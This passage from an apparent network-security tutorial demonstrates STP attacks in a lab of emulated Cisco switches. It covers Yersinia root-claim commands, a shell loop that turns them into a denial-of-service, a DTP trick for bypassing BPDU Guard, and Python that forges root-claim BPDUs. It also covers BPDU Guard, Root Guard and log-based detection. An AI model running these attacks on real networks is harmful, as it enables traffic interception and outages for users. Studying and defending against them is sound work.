<tr><td>Real gear</td><td class="yes" title="Yes"><span class="sr-only">Yes</span></td></tr>
</tbody>
</table>
<p>The attacker may find it convenient to raise himself to the position of
<abbr title="Spanning Tree Protocol"><span class="caps">STP</span></abbr> root.
This can easily be done using a single command:</p>
<div class="codehilite"><pre><span class="gp">backbox@backbox:~$</span> sudo yersinia stp -attack 4
<span class="go">Warning: interface ens3 selected as the default one</span>
<span class="go"><*> Starting NONDOS attack Claiming Root Role...</span>
<span class="go"><*> Press any key to stop the attack <*></span>
</pre></div>
<div class="admonition note">
<p class="admonition-title">Note</p>
<p>Keep the command running as long as you need to stay the <abbr title="Spanning Tree Protocol"><span class="caps">STP</span></abbr> root.</p>
<p>Once you stop the command, the <abbr title="Spanning Tree Protocol"><span class="caps">STP</span></abbr> negotiation will automatically restore
the tree in its initial state.</p>
</div>
<p>Leave a few seconds for the topology change to become effective, then check
the devices’ state again:</p>
<ul>
<li>
<p><em><span class="caps">ESW1</span></em> is not the root node on <span class="caps">VLAN</span> 1 anymore:</p>
<div class="codehilite"><pre><span class="gp">ESW1#</span><span class="k">show</span> spanning-tree vlan <span class="s">1</span> brief
<span class="go">VLAN1</span>
<span class="go">Spanning tree enabled protocol ieee</span>
<span class="go">Root ID Priority 8192</span>
<span class="go"> Address c202.0a3d.0000</span>
<span class="go"> Cost 57</span>
<span class="hll"><span class="go"> Port 43 (FastEthernet1/2)</span>
</span><span class="go"> Hello Time 2 sec Max Age 20 sec Forward Delay 15 sec</span>
<span class="go">Bridge ID Priority 8192</span>
<span class="go"> Address c202.0a3e.0000</span>
<span class="go"> Hello Time 2 sec Max Age 20 sec Forward Delay 15 sec</span>
<span class="go"> Aging Time 300</span>
<span class="go">Interface Designated</span>
<span class="go">Name Port ID Prio Cost Sts Cost Bridge ID Port ID</span>
<span class="go">-------------------- ------- ---- ----- --- ----- -------------------- -------</span>
<span class="go">FastEthernet1/0 128.41 128 19 FWD 57 8192 c202.0a3e.0000 128.41</span>
<span class="go">FastEthernet1/1 128.42 128 19 FWD 57 8192 c202.0a3e.0000 128.42</span>
<span class="go">FastEthernet1/2 128.43 128 19 FWD 38 32768 c204.0a5c.0000 128.41</span>
<span class="go">FastEthernet1/3 128.44 128 19 FWD 57 8192 c202.0a3e.0000 128.44</span>
<span class="go">FastEthernet1/4 128.45 128 19 FWD 57 8192 c202.0a3e.0000 128.45</span>
<span class="gp">ESW1#</span>
</pre></div>
<p>Note that in the current case per-<span class="caps">VLAN</span> spanning tree (<abbr title="Per VLAN Spanning Tree"><span class="caps">PVST</span></abbr>) is used,
therefore only <span class="caps">VLAN</span> 1 is affected by this attack:</p>
<div class="codehilite"><pre><span class="gp">ESW1#</span><span class="k">show</span> spanning-tree root brief
<span class="go"> Root Hello Max Fwd</span>
<span class="go">Vlan Root ID Cost Time Age Delay Root Port</span>
<span class="go">---------------- -------------------- ----- ---- ---- ----- ----------------</span>
<span class="hll"><span class="go">VLAN1 8192 c202.0a3d.0000 57 2 20 15 FastEthernet1/2</span>
</span><span class="go">VLAN2 8192 c202.0a3e.0001 0 2 20 15 This bridge is root</span>
<span class="go">VLAN3 8192 c202.0a3e.0002 0 2 20 15 This bridge is root</span>
<span class="gp">ESW1#</span>
</pre></div>
<p>This may vary depending on the devices used and their configuration.</p>
</li>
<li>
<p><em><span class="caps">ESW2</span></em> flipped to the attacker’s fake root bridge, it now uses the
previously disabled link to contact it and blocks the link to the
legitimate root bridge:</p>
<div class="codehilite"><pre><span class="gp">ESW2#</span><span class="k">show</span> spanning-tree vlan <span class="s">1</span> brief
<span class="go">VLAN1</span>
<span class="go">Spanning tree enabled protocol ieee</span>
<span class="go">Root ID Priority 8192</span>
<span class="hll"><span class="go"> Address c202.0a3d.0000</span>
</span><span class="go"> Cost 57</span>
<span class="hll"><span class="go"> Port 42 (FastEthernet1/1)</span>
</span><span class="go"> Hello Time 2 sec Max Age 20 sec Forward Delay 15 sec</span>
<span class="go">Bridge ID Priority 32768</span>
<span class="go"> Address c203.0a4d.0000</span>
<span class="go"> Hello Time 2 sec Max Age 20 sec Forward Delay 15 sec</span>
<span class="go"> Aging Time 300</span>
<span class="go">Interface Designated</span>
<span class="go">Name Port ID Prio Cost Sts Cost Bridge ID Port ID</span>
<span class="go">-------------------- ------- ---- ----- --- ----- -------------------- -------</span>
<span class="hll"><span class="go">FastEthernet1/0 128.41 128 19 BLK 57 8192 c202.0a3e.0000 128.42</span>
</span><span class="go">FastEthernet1/1 128.42 128 19 FWD 38 32768 c204.0a5c.0000 128.42</span>
<span class="go">FastEthernet1/2 128.43 128 19 FWD 57 32768 c203.0a4d.0000 128.43</span>
<span class="gp">ESW2#</span>
</pre></div>
</li>
<li>
<p><em><span class="caps">ESW3</span></em> now considers that the root bridge is connected to the
attacker’s port:</p>
<div class="codehilite"><pre><span class="gp">ESW3#</span><span class="k">show</span> spanning-tree vlan <span class="s">1</span> brief
<span class="go">VLAN1</span>
<span class="go">Spanning tree enabled protocol ieee</span>
<span class="go">Root ID Priority 8192</span>
<span class="go"> Address c202.0a3d.0000</span>
<span class="go"> Cost 38</span>
<span class="hll"><span class="go"> Port 43 (FastEthernet1/2)</span>
</span><span class="go"> Hello Time 2 sec Max Age 20 sec Forward Delay 15 sec</span>
<span class="go">Bridge ID Priority 32768</span>
<span class="go"> Address c204.0a5c.0000</span>
<span class="go"> Hello Time 2 sec Max Age 20 sec Forward Delay 15 sec</span>
<span class="go"> Aging Time 300</span>
<span class="go">Interface Designated</span>
<span class="go">Name Port ID Prio Cost Sts Cost Bridge ID Port ID</span>
<span class="go">-------------------- ------- ---- ----- --- ----- -------------------- -------</span>
<span class="go">FastEthernet1/0 128.41 128 19 FWD 38 32768 c204.0a5c.0000 128.41</span>
<span class="go">FastEthernet1/1 128.42 128 19 FWD 38 32768 c204.0a5c.0000 128.42</span>
<span class="go">FastEthernet1/2 128.43 128 19 FWD 19 32768 c204.0a5b.0000 128.43</span>
<span class="gp">ESW3#</span>
</pre></div>
</li>
</ul>
<p>This single command turned the <abbr title="Spanning Tree Protocol"><span class="caps">STP</span></abbr> topology into the following:</p>
<p><span class="lb-small"><a href="#after.png" id="after.png-thumb" title="Click to enlarge"><img alt="Altered spanning tree" src="https://www.whitewinterwolf.com/posts/2017/10/16/spanning-tree-protocol-exploitation/after.png"/></a></span></p>
<p>Notice that the previously blocked redundant link between <em><span class="caps">ESW2</span></em> and <em><span class="caps">ESW3</span></em> is
now in use.
In fact, during this attack,
<em>the attacker’s nearest switches take advantage of any redundant link to
optimize their path to the attacker.</em></p>
<ul>
<li>
<p>Previously, if the attacker wanted to intercept users’ communications,
the data would have had to go back and forth through <em><span class="caps">ESW1</span></em>.
Depending on <em><span class="caps">ESW1</span></em>’s location and load, this may cause speed and reliability
issues (both for the attacker and the users: users’ connectivity must be
maintained to have something to intercept).</p>
<p>Here is the initial route that users’ intercepted data should have taken:</p>
<div class="codehilite"><pre>User_1 > ESW2 > ESW1 > ESW3 > Attacker > ESW3 > ESW1 > R1 > ESW1 > ESW5 > Server_1
</pre></div>
<p>After the topology change, the attacker is closer to the intercepted users
and the interception process doesn’t increase <em><span class="caps">ESW1</span></em>’s load anymore:</p>
<div class="codehilite"><pre>User_1 > ESW3 > Attacker > ESW3 > ESW1 > R1 > ESW1 > ESW5 > Server_1
</pre></div>
</li>
<li>
<p>In the same way, if the attacker wants to flood users’ devices, he can now do
it without involving <em><span class="caps">ESW1</span></em> at all, making the flood more reliable,
effective and focused.</p>
</li>
</ul>
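<p>What Yersinia does in the attack above is inject Configuration <abbr title="Bridge Protocol Data Unit"><span class="caps">BPDU</span></abbr>s advertising a Bridge ID lower than the legitimate root’s: in the outputs above the root moved from <code>8192 c202.0a3e.0000</code> to <code>8192 c202.0a3d.0000</code>, the same priority with a numerically lower <span class="caps">MAC</span>. The following is an added example written for this page, not Yersinia’s code nor anything from the original post. It builds and parses 802.1D Configuration <abbr title="Bridge Protocol Data Unit"><span class="caps">BPDU</span></abbr>s (the <abbr title="Spanning Tree Protocol"><span class="caps">STP</span></abbr> multicast destination, 802.3 length field and <abbr title="Logical Link Control"><span class="caps">LLC</span></abbr> header included), shows why the rogue Bridge ID wins, and, on the defensive side, flags any <abbr title="Bridge Protocol Data Unit"><span class="caps">BPDU</span></abbr> that advertises a root other than the trusted one. The attacker’s source <span class="caps">MAC</span>, the port ID <code>0x8001</code> and how the rogue ID is chosen are assumptions; the code never puts anything on the wire (that would need a raw socket and <code>CAP_NET_RAW</code>). It only handles the IEEE format seen on <span class="caps">VLAN</span> 1; the <abbr title="Per VLAN Spanning Tree"><span class="caps">PVST</span></abbr>+ <abbr title="Bridge Protocol Data Unit"><span class="caps">BPDU</span></abbr>s Cisco sends for other VLANs use a different destination and a <abbr title="Subnetwork Access Protocol"><span class="caps">SNAP</span></abbr> header and are not parsed here.</p>

```python
import struct
from dataclasses import dataclass
from typing import Iterable, List, Optional, Tuple

STP_MULTICAST = bytes.fromhex("0180c2000000")   # 802.1D bridge group address
LLC_STP = b"\x42\x42\x03"                       # DSAP 0x42, SSAP 0x42, UI control field
BPDU_CONFIG = 0x00                              # BPDU type: Configuration
_BPDU_FMT = "!HBBB8sI8sHHHHH"                   # 35-byte 802.1D Configuration BPDU


def mac_bytes(mac: str) -> bytes:
    """Accepts Cisco 'c202.0a3e.0000' as well as 'c2:02:0a:3e:00:00' notation."""
    return bytes.fromhex(mac.replace(".", "").replace(":", ""))


def bridge_id(priority: int, mac: str) -> bytes:
    """8-byte Bridge ID = 16-bit priority || bridge MAC; the numerically lowest wins."""
    return struct.pack("!H", priority) + mac_bytes(mac)


def fmt_bridge_id(bid: bytes) -> str:
    prio = struct.unpack("!H", bid[:2])[0]
    h = bid[2:].hex()
    return f"{prio} {h[0:4]}.{h[4:8]}.{h[8:12]}"


@dataclass
class ConfigBpdu:
    root_id: bytes
    root_path_cost: int
    bridge_id: bytes
    port_id: int
    flags: int = 0
    message_age: float = 0.0
    max_age: float = 20.0        # defaults match the timers shown above
    hello_time: float = 2.0
    forward_delay: float = 15.0

    def pack(self) -> bytes:
        # Protocol ID 0, version 0 (802.1D), type 0; timers are carried in 1/256 s units.
        return struct.pack(_BPDU_FMT, 0, 0, BPDU_CONFIG, self.flags,
                           self.root_id, self.root_path_cost, self.bridge_id, self.port_id,
                           int(self.message_age * 256), int(self.max_age * 256),
                           int(self.hello_time * 256), int(self.forward_delay * 256))


def stp_frame(src_mac: str, bpdu: ConfigBpdu) -> bytes:
    """802.3 frame (length field, not an EtherType) + LLC + BPDU, as a bridge sends it."""
    payload = LLC_STP + bpdu.pack()
    return STP_MULTICAST + mac_bytes(src_mac) + struct.pack("!H", len(payload)) + payload


def parse_stp_frame(frame: bytes) -> Optional[ConfigBpdu]:
    """Return the Configuration BPDU carried by a frame, or None for anything else."""
    if len(frame) < 14 + 3 + 35 or frame[:6] != STP_MULTICAST or frame[14:17] != LLC_STP:
        return None
    proto, _ver, btype, flags, root, cost, bridge, port, age, maxage, hello, fwd = \
        struct.unpack(_BPDU_FMT, frame[17:52])
    if proto != 0 or btype != BPDU_CONFIG:
        return None
    return ConfigBpdu(root, cost, bridge, port, flags,
                      age / 256, maxage / 256, hello / 256, fwd / 256)


def root_claim(rogue_root_id: bytes, observed: ConfigBpdu) -> ConfigBpdu:
    """BPDU an attacker sends to claim the root role: it advertises itself as root
    (path cost 0) under a Bridge ID lower than the current root's, copying the root's
    timers so nothing else looks out of place. Port ID 0x8001 is an arbitrary choice."""
    return ConfigBpdu(root_id=rogue_root_id, root_path_cost=0, bridge_id=rogue_root_id,
                      port_id=0x8001, max_age=observed.max_age,
                      hello_time=observed.hello_time, forward_delay=observed.forward_delay)


def rogue_root_alerts(frames: Iterable[bytes], trusted_root_id: bytes) -> List[Tuple[str, str, bool]]:
    """Monitor-side check: (source MAC, advertised root, superior?) for every BPDU whose
    root differs from the trusted one. 'superior' means it would actually win the election."""
    alerts = []
    for frame in frames:
        bpdu = parse_stp_frame(frame)
        if bpdu is None or bpdu.root_id == trusted_root_id:
            continue
        alerts.append((frame[6:12].hex(":"), fmt_bridge_id(bpdu.root_id),
                       bpdu.root_id < trusted_root_id))
    return alerts


if __name__ == "__main__":
    legit = bridge_id(8192, "c202.0a3e.0000")                       # ESW1, from the outputs above
    seen = parse_stp_frame(stp_frame("c202.0a3e.0000", ConfigBpdu(legit, 0, legit, 0x8029)))
    rogue = bridge_id(8192, "c202.0a3d.0000")                       # rogue root, from the outputs above
    forged = stp_frame("c2:02:0a:3d:00:00", root_claim(rogue, seen))  # attacker MAC is assumed
    print(rogue_root_alerts([forged], legit))
```

<p>The comparison is a plain byte-wise one on the 8-byte Bridge ID, which is why lowering the <span class="caps">MAC</span> by one is enough when priorities are equal; Root Guard on the distribution uplinks and <abbr title="Bridge Protocol Data Unit"><span class="caps">BPDU</span></abbr> Guard on access ports act on exactly the condition <code>rogue_root_alerts()</code> reports.</p>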
<h4 id="stp-based-denial-of-service"><a class="toclink" href="#stp-based-denial-of-service"><abbr title="Spanning Tree Protocol"><span class="caps">STP</span></abbr>-based denial-of-service</a></h4>
<table class="floatright">
<thead>
<tr><th>Lab</th><th>Compatible</th></tr>
</thead>
<tbody>
<tr><td>Dynamips</td><td class="yes" title="Yes"><span class="sr-only">Yes</span></td></tr>
<tr><td><span class="caps">IOU</span></td><td class="no" title="No"><span class="sr-only">No</span></td></tr>
<tr><td>Real gear</td><td class="yes" title="Yes"><span class="sr-only">Yes</span></td></tr>
</tbody>
</table>
<p>A spanning tree takes time to converge, and while it does so the ports going through
the listening and learning states (2 × Forward Delay, i.e. 30 seconds with the
timers shown above) do not forward any user data.</p>
<p>A basic <abbr title="Denial-Of-Service"><span class="caps">DOS</span></abbr> attack therefore consists in regularly triggering topology
changes, resetting the convergence process before it has any chance to finish.</p>
<p>Sadly, Yersinia’s <abbr title="Denial-Of-Service"><span class="caps">DOS</span></abbr> attack goes a way too brutal route by sending tens of
thousands of notifications per second (as fast as the link and local <span class="caps">CPU</span> can handle).
This is counterproductive: it doesn’t even leave the time for a notification to
propagate through the tree, and doesn’t seem to achieve anything.</p>
<p>It is however possible to reuse the same command as above wrapped in a bit of
shell voodoo:</p>
<div class="codehilite"><pre><span class="nv">delay</span><span class="o">=</span>7<span class="p">;</span> <span class="k">while</span> sleep <span class="nv">$delay</span><span class="p">;</span> <span class="k">do</span> sleep <span class="nv">$delay</span> <span class="p">|</span> sudo yersinia stp -attack 4<span class="p">;</span> <span class="k">done</span>
</pre></div>
<p>This command claims the root role, waits a little, gives the root role back to
the legitimate root bridge, waits a little, and loops by claiming the root role
again.
A delay of 7 seconds leaves enough time for a new root election to be initiated but,
being well below the 30 seconds (2 × Forward Delay) needed to bring a port back to
forwarding, not enough for it to complete, thus resulting in an effective <abbr title="Denial-Of-Service"><span class="caps">DOS</span></abbr>:</p>
<p><span class="lb-small"><a href="#dos.png" id="dos.png-thumb" title="Click to enlarge"><img alt="User_1 cannot contact Server_1 anymore" src="https://www.whitewinterwolf.com/posts/2017/10/16/spanning-tree-protocol-exploitation/dos.png"/></a></span></p>
<div class="admonition note">
<p class="admonition-title">Note</p>
<p>As seen previously, <abbr title="Per VLAN Spanning Tree"><span class="caps">PVST</span></abbr> being used, each <span class="caps">VLAN</span> has its own spanning tree.
The effect of this <abbr title="Spanning Tree Protocol"><span class="caps">STP</span></abbr>-based <abbr title="Denial-Of-Service"><span class="caps">DOS</span></abbr> attack is therefore limited to
the current <span class="caps">VLAN</span> (but as we will see in later posts the attacker may
be able to change his current <span class="caps">VLAN</span>).</p>
<p>While members of the <em>Users</em> <span class="caps">VLAN</span> have lost connectivity with <em>Server_1</em>,
members of the <em>Admins</em> <span class="caps">VLAN</span> can still access it without any issue.</p>
</div>
<h3 id="mitigation"><a class="toclink" href="#mitigation">Mitigation</a></h3>
<p>There are two measures you can take to mitigate this attack.
They are not exclusive; in fact it is recommended to apply both as they
complement each other well.</p>
<h4 id="bpdu-guard-access-layer"><a class="toclink" href="#bpdu-guard-access-layer"><abbr title="Bridge Protocol Data Unit"><span class="caps">BPDU</span></abbr> Guard (access layer)</a></h4>
<table class="floatright">
<thead>
<tr><th>Lab</th><th>Compatible</th></tr>
</thead>
<tbody>
<tr><td>Dynamips</td><td class="yes" title="Yes"><span class="sr-only">Yes</span></td></tr>
<tr><td><span class="caps">IOU</span></td><td class="yes" title="Yes"><span class="sr-only">Yes</span></td></tr>
<tr><td>Real gear</td><td class="yes" title="Yes"><span class="sr-only">Yes</span></td></tr>
</tbody>
</table>
<p>The <a href="https://www.cisco.com/c/en/us/support/docs/lan-switching/spanning-tree-protocol/10586-65.html" rel="external" title="Spanning Tree PortFast BPDU Guard Enhancement (Cisco)"><abbr title="Bridge Protocol Data Unit"><span class="caps">BPDU</span></abbr> Guard</a> feature comes with PortFast:</p>
<ul>
<li>
<p>PortFast allows a port to skip the listening and learning steps of the <abbr title="Spanning Tree Protocol"><span class="caps">STP</span></abbr>
convergence process, so that it starts forwarding frames sooner and reduces unavailability.
In particular, PortFast bypasses topology loop checks and must therefore be
enabled only on ports where no switch will ever be connected: access ports.</p>
</li>
<li>
<p><abbr title="Bridge Protocol Data Unit"><span class="caps">BPDU</span></abbr> Guard accompanies PortFast by actively checking that no <abbr title="Bridge Protocol Data Unit"><span class="caps">BPDU</span></abbr>
(the packets carrying <abbr title="Spanning Tree Protocol"><span class="caps">STP</span></abbr> messages) is received on such ports.
Should a <abbr title="Bridge Protocol Data Unit"><span class="caps">BPDU</span></abbr> be received on a protected port, <abbr title="Bridge Protocol Data Unit"><span class="caps">BPDU</span></abbr> Guard
shuts it down, either temporarily or permanently depending on the configuration.</p>
</li>
</ul>
<p>The most convenient way is to first enable <abbr title="Bridge Protocol Data Unit"><span class="caps">BPDU</span></abbr> Guard globally for all
PortFast ports, and then enable PortFast on the desired ports:</p>
<div class="codehilite"><pre><span class="gp">ESW3#</span><span class="k">conf</span> t
<span class="go">Enter configuration commands, one per line. End with CNTL/Z.</span>
<span class="hll"><span class="gp">ESW3(config)#</span><span class="k">spanning-tree</span> portfast bpduguard
</span><span class="gp">ESW3(config)#</span><span class="k">interface</span><span class="s"> fastEthernet 1/2</span>
<span class="hll"><span class="gp">ESW3(config-if)#</span><span class="k">spanning-tree</span> portfast
</span><span class="go">%Warning: portfast should only be enabled on ports connected to a single host.</span>
<span class="go">Connecting hubs, concentrators, switches, bridges, etc.to this interface</span>
<span class="go">when portfast is enabled, can cause temporary spanning tree loops.</span>
<span class="go">Use with CAUTION</span>
<span class="go">%Portfast has been configured on FastEthernet1/2 but will only</span>
<span class="go">have effect when the interface is in a non-trunking mode.</span>
<span class="gp">ESW3(config-if)#</span><span class="nb">end</span>
<span class="gp">ESW3#</span>
<span class="gt">*Mar 1 00:20:45.131: %SYS-5-CONFIG_I: Configured from console by console</span>
<span class="gp">ESW3#</span><span class="k">copy</span> running-config startup-config
<span class="go">Destination filename [startup-config]?</span>
<span class="go">Building configuration...</span>
<span class="go">[OK]</span>
<span class="gp">ESW3#</span>
</pre></div>
<p>Attempting to reproduce the attack now shuts the attacker’s port down:</p>
<div class="codehilite"><pre><span class="gp">ESW3#</span>
<span class="gt">*Mar 1 00:04:36.279: %SPANTREE-2-RX_PORTFAST: Received BPDU on PortFast enabled port. Disabling FastEthernet1/2.</span>
<span class="gp">ESW3#</span>
<span class="gt">*Mar 1 00:04:36.279: %PM-4-ERR_DISABLE: bpduguard error detected on Fa1/2, putting Fa1/2 in err-disable state</span>
<span class="gp">ESW3#</span>
<span class="gt">*Mar 1 00:04:37.283: %LINEPROTO-5-UPDOWN: Line protocol on Interface FastEthernet1/2, changed state to down</span>
<span class="gp">ESW3#</span>
<span class="gt">*Mar 1 00:04:38.315: %LINK-3-UPDOWN: Interface FastEthernet1/2, changed state to down</span>
<span class="gp">ESW3#</span>
<span class="gp">ESW3#</span><span class="k">show</span> interfaces status err-disabled
<span class="go">Port Name Status Reason</span>
<span class="hll"><span class="go">Fa1/2 err-disabled bpduguard</span>
</span><span class="gp">ESW3#</span>
</pre></div>
<p>By default, ports disabled this way must be manually re-enabled using the
<code>shut</code> and <code>no shut</code> commands:</p>
<div class="codehilite"><pre><span class="gp">ESW3#</span><span class="k">conf</span> t
<span class="go">Enter configuration commands, one per line. End with CNTL/Z.</span>
<span class="gp">ESW3(config)#</span><span class="k">interface</span><span class="s"> fastEthernet 1/2</span>
<span class="hll"><span class="gp">ESW3(config-if)#</span><span class="k">shutdown</span>
</span><span class="gp">ESW3(config-if)#</span>
<span class="gt">*Mar 1 00:12:59.087: %LINK-5-CHANGED: Interface FastEthernet1/2, changed state to administratively down</span>
<span class="hll"><span class="gp">ESW3(config-if)#</span><span class="ow">no </span><span class="k">shutdown</span>
</span><span class="gp">ESW3(config-if)#</span>
<span class="gt">*Mar 1 00:13:09.343: %LINEPROTO-5-UPDOWN: Line protocol on Interface FastEthernet1/2, changed state to up</span>
<span class="gp">ESW3(config-if)#</span><span class="nb">end</span>
<span class="gp">ESW3#</span>
<span class="gt">*Mar 1 00:13:13.707: %SYS-5-CONFIG_I: Configured from console by console</span>
<span class="gp">ESW3#</span>
</pre></div>
<p>It is however possible to set a timeout after which the port will be
automatically restored:</p>
<div class="codehilite"><pre><span class="gp">ESW3#</span><span class="k">conf</span> t
<span class="go">Enter configuration commands, one per line. End with CNTL/Z.</span>
<span class="hll"><span class="gp">ESW3(config)#</span><span class="k">errdisable</span> recovery cause bpduguard
</span><span class="gp">ESW3(config)#</span><span class="c1">! By default the timeout is set to 300 seconds (= 5 minutes), to change it:</span>
<span class="hll"><span class="gp">ESW3(config)#</span><span class="k">errdisable</span> recovery interval <span class="s">30</span>
</span><span class="gp">ESW3(config)#</span><span class="nb">end</span>
<span class="gp">ESW3#</span>
<span class="gt">*Mar 1 00:32:08.995: %SYS-5-CONFIG_I: Configured from console by console</span>
<span class="gp">ESW3#</span><span class="k">show</span> errdisable recovery
<span class="go">ErrDisable Reason Timer Status</span>
<span class="go">----------------- --------------</span>
<span class="go">udld Disabled</span>
<span class="go">bpduguard Enabled</span>
<span class="go">rootguard Disabled</span>
<span class="go">pagp-flap Disabled</span>
<span class="go">dtp-flap Disabled</span>
<span class="go">link-flap Disabled</span>
<span class="go">Timer interval: 30 seconds</span>
<span class="go">Interfaces that will be enabled at the next timeout:</span>
<span class="gp">ESW3#</span>
</pre></div>
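<p>On the defender’s side, here is an added example (not code from the original post) that turns <span class="caps">IOS</span> console messages of the kind shown above into <abbr title="Spanning Tree Protocol"><span class="caps">STP</span></abbr> guard alerts. It also understands the <code>%SPANTREE-2-ROOTGUARD_BLOCK</code>/<code>ROOTGUARD_UNBLOCK</code> pair emitted by Root Guard, which is covered further down. The sample lines reuse the messages printed on this page plus one made-up Root Guard block on <code>Ethernet1/3</code>; they are constructed input, not a capture.</p>

```python
"""Turn Cisco IOS console messages into STP guard alerts.

Added example, not code from the original post.  The sample lines are
constructed from the message formats shown on this page; the line shape is
the usual IOS one: '*Mon DD HH:MM:SS.mmm: %FACILITY-SEVERITY-MNEMONIC: text'.
"""
import re

LOG_RE = re.compile(
    r"^\*?(?P<ts>[A-Z][a-z]{2}\s+\d+\s+\d\d:\d\d:\d\d\.\d+):\s+"
    r"%(?P<fac>[A-Z_]+)-(?P<sev>\d)-(?P<mnem>[A-Z_]+):\s+(?P<text>.*)$"
)
IFACE_RE = re.compile(
    r"\b((?:TenGigabitEthernet|GigabitEthernet|FastEthernet|Ethernet|Te|Gi|Fa|Et)"
    r"\d+(?:/\d+)*)\b"
)
SHORT_NAMES = [("TenGigabitEthernet", "Te"), ("GigabitEthernet", "Gi"),
               ("FastEthernet", "Fa"), ("Ethernet", "Et")]

# (facility, mnemonic) -> what it means for us.  ROOTGUARD_UNBLOCK closes an
# incident; a bpduguard err-disable never closes by itself unless errdisable
# recovery is configured, so it stays in the "blocked" set below.
GUARD_EVENTS = {
    ("SPANTREE", "RX_PORTFAST"): "bpdu-on-access-port",
    ("PM", "ERR_DISABLE"): "err-disabled",
    ("SPANTREE", "ROOTGUARD_BLOCK"): "root-claim-blocked",
    ("SPANTREE", "ROOTGUARD_UNBLOCK"): "root-claim-stopped",
}


def short_iface(name):
    """Fold the long spelling (FastEthernet1/2) onto the short one (Fa1/2)
    so that RX_PORTFAST and ERR_DISABLE lines refer to the same port."""
    for long_form, short in SHORT_NAMES:
        if name.startswith(long_form):
            return short + name[len(long_form):]
    return name


def parse_line(line):
    """Split one console line into its fields, or return None."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    found = IFACE_RE.search(rec["text"])
    rec["iface"] = short_iface(found.group(1)) if found else None
    return rec


def guard_events(lines):
    """Yield (timestamp, interface, event) for each STP guard message."""
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        key = (rec["fac"], rec["mnem"])
        if key not in GUARD_EVENTS:
            continue
        # ERR_DISABLE has many causes (link-flap, udld, ...): keep bpduguard only.
        if key == ("PM", "ERR_DISABLE") and not rec["text"].startswith("bpduguard"):
            continue
        yield rec["ts"], rec["iface"], GUARD_EVENTS[key]


def ports_still_blocked(lines):
    """Ports blocked by a guard whose release has not been logged yet."""
    blocked = set()
    for _, iface, event in guard_events(lines):
        if event in ("err-disabled", "root-claim-blocked"):
            blocked.add(iface)
        elif event == "root-claim-stopped":
            blocked.discard(iface)
    return blocked


# Constructed sample: the BPDU Guard and Root Guard lines of this page plus one
# extra Root Guard block (Et1/3) that has not been released.
SAMPLE_LOG = """\
*Mar 1 00:04:36.279: %SPANTREE-2-RX_PORTFAST: Received BPDU on PortFast enabled port. Disabling FastEthernet1/2.
*Mar 1 00:04:36.279: %PM-4-ERR_DISABLE: bpduguard error detected on Fa1/2, putting Fa1/2 in err-disable state
*Mar 1 00:04:37.283: %LINEPROTO-5-UPDOWN: Line protocol on Interface FastEthernet1/2, changed state to down
*Oct 16 11:30:45.588: %SPANTREE-2-ROOTGUARD_BLOCK: Root guard blocking port Ethernet1/1 on VLAN0001.
*Oct 16 11:40:40.657: %SPANTREE-2-ROOTGUARD_UNBLOCK: Root guard unblocking port Ethernet1/1 on VLAN0001.
*Oct 16 11:41:02.113: %SPANTREE-2-ROOTGUARD_BLOCK: Root guard blocking port Ethernet1/3 on VLAN0001.
"""

if __name__ == "__main__":
    for ts, iface, event in guard_events(SAMPLE_LOG.splitlines()):
        print(ts, str(iface), event)
    print("still blocked:", sorted(ports_still_blocked(SAMPLE_LOG.splitlines())))
```

<p>Feed it the output of <code>show logging</code> or a syslog collector: a port that stays in the blocked set without a matching release is either an err-disabled access port waiting for an administrator, or a Root Guard block still under attack.</p>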
<h5 id="circumventing-bpdu-guard"><a class="toclink" href="#circumventing-bpdu-guard">Circumventing <abbr title="Bridge Protocol Data Unit"><span class="caps">BPDU</span></abbr> Guard</a></h5>
<table class="floatright">
<thead>
<tr><th>Lab</th><th>Compatible</th></tr>
</thead>
<tbody>
<tr><td>Dynamips</td><td class="no" title="No"><span class="sr-only">No</span></td></tr>
<tr><td><span class="caps">IOU</span></td><td class="yes" title="Yes"><span class="sr-only">Yes</span></td></tr>
<tr><td>Real gear</td><td class="yes" title="Yes"><span class="sr-only">Yes</span></td></tr>
</tbody>
</table>
<p>Depending on the devices used and their configuration, it may be possible for
an attacker to bypass <abbr title="Bridge Protocol Data Unit"><span class="caps">BPDU</span></abbr> Guard protection.</p>
<p>As previously stated, <abbr title="Bridge Protocol Data Unit"><span class="caps">BPDU</span></abbr> Guard relies on PortFast, and when enabling PortFast
on a port <span class="caps">IOS</span> produces a warning stating that:</p>
<blockquote>
<p>Portfast […] will only have effect when the interface is in a
non-trunking mode.</p>
</blockquote>
<p>The consequence of this is that an attacker who has the ability to enable
trunk mode on the port has the ability to disable Portfast, and therefore
to disable <abbr title="Bridge Protocol Data Unit"><span class="caps">BPDU</span></abbr> Guard altogether.</p>
<p>We will cover <abbr title="Dynamic Trunking Protocol"><span class="caps">DTP</span></abbr>-based exploits in a later post, but here just notice that
simply leaving <code>yersinia dtp -attack 1</code> running in one terminal should
effectively disable <abbr title="Bridge Protocol Data Unit"><span class="caps">BPDU</span></abbr> Guard and make all the <abbr title="Spanning Tree Protocol"><span class="caps">STP</span></abbr> attacks described in this
post work again as-is.</p>
<div class="admonition note">
<p class="admonition-title">Note</p>
<p>This affects only <abbr title="Dynamic Trunking Protocol"><span class="caps">DTP</span></abbr>-aware devices, so <strong><em>not</em></strong> router-based switches.</p>
</div>
<h4 id="root-guard-distribution-layer"><a class="toclink" href="#root-guard-distribution-layer">Root Guard (distribution layer)</a></h4>
<table class="floatright">
<thead>
<tr><th>Lab</th><th>Compatible</th></tr>
</thead>
<tbody>
<tr><td>Dynamips</td><td class="no" title="No"><span class="sr-only">No</span></td></tr>
<tr><td><span class="caps">IOU</span></td><td class="yes" title="Yes"><span class="sr-only">Yes</span></td></tr>
<tr><td>Real gear</td><td class="yes" title="Yes"><span class="sr-only">Yes</span></td></tr>
</tbody>
</table>
<p>The <a href="https://www.cisco.com/c/en/us/support/docs/lan-switching/spanning-tree-protocol/10588-74.html" rel="external" title="Spanning Tree Protocol Root Guard Enhancement (Cisco)">Root Guard</a> feature prevents the ports where it is enabled from ever
becoming root ports, i.e. ports used to reach the root bridge.</p>
<p>Root Guard has two main differences compared to <abbr title="Bridge Protocol Data Unit"><span class="caps">BPDU</span></abbr> Guard:</p>
<ul>
<li>
<p>Root Guard does not prevent <abbr title="Spanning Tree Protocol"><span class="caps">STP</span></abbr> communication on the ports where it is
enabled: it only reacts to <abbr title="Bridge Protocol Data Units">BPDUs</abbr> which would lead to the election of a root
behind protected ports.</p>
</li>
<li>
<p>The port connectivity (forwarding state) is automatically re-enabled as
